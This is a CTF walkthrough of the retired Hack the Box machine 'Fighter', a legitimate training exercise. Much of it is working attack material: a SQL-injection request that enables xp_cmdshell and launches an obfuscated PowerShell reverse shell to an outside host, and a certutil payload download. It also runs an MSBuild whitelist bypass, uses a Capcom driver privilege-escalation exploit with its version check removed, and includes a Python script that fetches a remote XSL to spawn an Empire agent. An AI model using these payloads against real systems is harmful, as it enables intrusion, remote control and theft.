Today we are going to solve another CTF challenge “Fighter”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Fighter is 10.10.10.72
Let’s start off with our basic nmap command to find out the open ports and services.
C:\Users\jacco>nmap -sC -sV -T4 10.10.10.72 Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-24 09:46 W. Europe Summer Time Nmap scan report for streetfighterclub.htb (10.10.10.72) Host is up (0.029s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: StreetFighter Club Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.67 seconds
The Nmap output shows us that there is only 1 port open: 80(HTTP)
We find that port 80 is running http, so we open the IP in our browser.
In the homepage, we find the Domain name “streetfighterclub.htb”. We add the domain to our /etc/hosts file.
We don’t find anything new on the webpage, but further looking into the webpage we find that there might be subdomains available that will give us more clues. We intercept the request and send it to the intruder. We select where we want to brute force the request.
We select the wordlist, we use namelist.txt located in /usr/share/dnsrecon/.
After bruteforcing, we find a subdomain called “members.streetfighterclub.htb” that gave HTTP code 403.
We add the subdomain in /etc/hosts so that we can access the web site.
We open the webpage and got a 403 Forbidden error.
We now run a dirb scan on the members.streetfighter.htb and find a directory called “old”.
dirb http://members.streetfighterclub.htb/
We then find web pages inside that directory. As we know that it is IIS server we find “asp” files on the web server and find a page called “login.asp”.
dirb http://members.streetfighterclub.htb/old -X .asp
We open the web page and find a login page.
We enumerate the webpage and find that the web application is vulnerable to SQL injection. We find username, password, and e-mail but were unable to login. So we tried command injection using SQL injection. We referred this link.
POST /old/verify.asp HTTP/1.1 Host: members.streetfighterclub.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: nl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://members.streetfighterclub.htb/old/Login.asp Content-Type: application/x-www-form-urlencoded Content-Length: 944 Connection: close Cookie: ASPSESSIONIDACRSQCAA=PDDFFGAADNIIKGMMCKGJFIPB; Email=; Level=%2D1; Chk=1821; password=YWRtaW4%3D; username=YWRtaW4%3D Upgrade-Insecure-Requests: 1 username=admin&password=admin&logintype=1%3bEXEC+sp_configure+'show+advanced+options',+1%3bRECONFIGURE+WITH+OVERRIDE%3bEXEC+sp_configure+'xp_cmdshell',+1%3bRECONFIGURE+WITH+OVERRIDE%3bdrop+table+fighter%3bcreate+table+fighter+(out+varchar(8000))%3binsert+into+fighter+(out)+execute+Xp_cMdsHelL+'C%3a\WIndOWs\sySwOw64\WINdOwspOweRshEll\v1.0\poWersHeLl.Exe+"$clIEnT+%3d+NEw-ObJect+SYstEm.nEt.SOckEts.TcPclIeNt(\"10.10.14.20\",80)%3b$stReAm+%3d+$clIEnT.GetsTrEam()%3b[byte[]]$bYtEs+%3d+0..65535|%25{0}%3bwHIle(($i+%3d+$stReAm.Read($bYtEs,+0,+$bYtEs.LEnGth))+-ne+0){%3b$dAta+%3d+(NEW-oBjecT+-TypeNAme+SYsTem.tExt.ASCIiENcoDing).GEtstRInG($bYtEs,0,+$i)%3b$sEndback+%3d+(iEX+$data+2>%261+|+OUt-stRing+)%3b$Sendback2+%3d+$sEndback+%2b+\"sH3lL+\"+%2b+(pWd).PAth+%2b+\"^>+\"%3b$senDbyte+%3d+([texT.eNCodIng]%3a%3aAScIi).GEtByTes($Sendback2)%3b$stReAm.WRite($senDbyte,0,$senDbyte.Length)%3b$stReAm.FLuSh()}%3b$clIEnT.CloSe()"'%3b&rememberme=ON&B1=Login
We set up our listener and got a reverse shell.
C:\Users\jacco>nc -lvp 80 listening on [any] 80 ... connect to [10.10.14.20] from streetfighterclub.htb [10.10.10.72] 49440 whoami fighter\sqlserv
We are not able to find anything on the target machine. So we try to convert our shell into meterpreter but are unable to run any exe file. So there was a firewall that didn’t allow us to run any exe file. We got a reference through this link on how to bypass this. We use the nps payload to create an XML file that will contain our payload (download from here).
We move into “c:\users\sqlserv” as we have a shell as user sqlserv.
We run the command provided by npc payload to start our listener.
msfconsole -r msbuild_nps.rc
We start our python HTTP Server to send our file to the target machine.
python -m SimpleHTTPServer 80
We download the file using certutil.exe on the target machine.
certutil.exe -urlcache -split -f http://10.10.14.3/msbuild_nps.xml msbuild_nps.xml
We then run the XML file we uploaded using msbuild.exe.
1
|
c:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe msbuild_nps.xml
|
As soon as we run the file we get a meterpreter session. As we can see by running sysinfo we have a 32-bit meterpreter session on a 64-bit machine.
To convert it into 64-bit session, we check the processes and find the 64-bit running process. We then migrate our process to a 64-bit process and get a 64-bit session.
meterpreter > ps meterpreter > migrate 2320
We still don’t find anything to escalate our privilege. As this machine on street fighter game, we try to google street fighter exploit and find that street fighter 5 has privilege escalation vulnerability. We find that street fighter has a service called Capcom, so we check if street fighter 5 is installed on the target machine.
sc query capcom
We find this Metasploit exploit here, we try to run it but are unable to get a shell as it gave an error stating that the system was not vulnerable. So we make changes to the code and comment out the section where it checks the OS version.
Now we are successfully able to run the exploit.
msf > use exploit/windows/local/capcom_sys_exec msf exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp msf exploit(windows/local/capcom_sys_exec) > set lhost tun0 msf exploit(windows/local/capcom_sys_exec) > set lport 80 msf exploit(windows/local/capcom_sys_exec) > set session 2 msf exploit(windows/local/capcom_sys_exec)> run
When we check the uid we find that we are successfully able to get administrative rights.
We enumerate the directories to find the flags and inside “c:\users\decoder\Desktop”, we find a file called “user.txt”. When we take look at the content of the file we find our first flag.
We move into c:\users\Administrator\Desktop and find a file called “root.exe”. We run it and find that it asks for a password. There is also a DLL file called “checkdll.dll”, as the password might be checked using this DLL file.
We download both the files into our system using meterpreter.
download root.exe /root/Desktop download checkdll.dll /root/Desktop
We reverse engineer them using IDA and find that this program XOR’s 9 with each character of the variable aFmFeholH. Now analyzing with IDA tells us that the variable contains “FmfEhO1}h”.
So we create a c program that XOR’s 9 with each character of “Fm
fEhO1}h”.
We compile and run the file and get the password to be “OdioLaFeta”.
When we provide the password to the root.exe we get our final flag.
…
With help of Empire
bypass the defender : starfighter_xsl from empire by Luis Vacas
For this we are going to develop a small python script that makes us run our .xsl and get empire agent :
root@kali:~/htb/fighter# python3 -m http.server 443 Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ... 10.10.10.72 - - [26/Apr/2019 11:03:33] "GET /WOJO.XSL HTTP/1.1" 200 -
root@kali:~/htb/fighter# cat iron.py from requests import * params = {"username":"admin","password":"admin","B1":"LogIn","logintype":"1;EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'xP_cmDshEll', 1;RECONFIGURE WITH OVERRIDE;drop table mojones;create table mojones (out varchar(8000));;insert into mojones (out) execute xp_CmdSheLl 'start wmic process get brief /format:\"http://10.10.14.20:443/wojo.xsl\"';EXEC sp_configure 'xP_cMdShelL', 0;RECONFIGURE WITH OVERRIDE;"} resp = post("http://members.streetfighterclub.htb/old/verify.asp",data=params,allow_redirects=False,cookies={"ASPSESSIONIDCARRRDBA":"IFMBKKKDLPNKELDDENPKDKNB"})
Let’s migrate the empire to metasploit:https://github.com/trustedsec/nps_payload (example of use)
1
2
3
|
cd C:\Users\sqlserv upload /tmp/msbuild_nps.xml msbuild_nps.xml C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe msbuild_nps.xml |
Author:Puckiestyle
reference used: https://ironhackers.es/en/writeups/hackthebox/writeup-fighter-hackthebox/